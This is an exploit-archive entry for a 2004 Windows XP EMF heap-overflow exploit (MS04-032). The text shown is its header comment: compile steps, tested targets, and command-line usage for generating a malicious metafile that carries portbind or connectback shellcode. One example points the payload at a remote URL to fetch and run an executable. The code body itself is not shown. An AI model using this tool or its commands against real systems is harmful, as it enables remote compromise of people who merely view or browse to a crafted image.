Win_emf_HeapOverflow_MS04-032.c

Submitted: 2004-10-21
Submitted by: dav1d
Tool category: Exploit program
Platform: Windows
Tool size: 9024 Bytes
File MD5: 934559e3179b9305093e1c4d4ce01862
Tool source: k-otik

/* HOD-ms04032-emf-expl2.c:
 *
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow
 *
 * Exploit version 0.2 (PUBLIC) coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 * [at inbox dot ru]
 * -------------------------------------------------------------------
 * About WMF/EMF:
 * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats
 * are vector files that can contain a raster image...
 *
 * -------------------------------------------------------------------
 * The vulnerability will be triggered by either viewing a malicious
 * file or by navigating to a directory, which contains a malicious
 * file and displays it as a thumbnail.
 *
 * Graphics Rendering Engine Vulnerability - CAN-2004-0209
 * -------------------------------------------------------------------
 * Tested on:
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *    - Explorer (explorer.exe)
 *    - Windows XP SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *    HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 *    Shellcode:
 *       1 - Portbind shellcode
 *       2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Examples:
 *
 *    C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777
 *
 *    C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
 *
 * -------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission to
 * do so.
 *
 */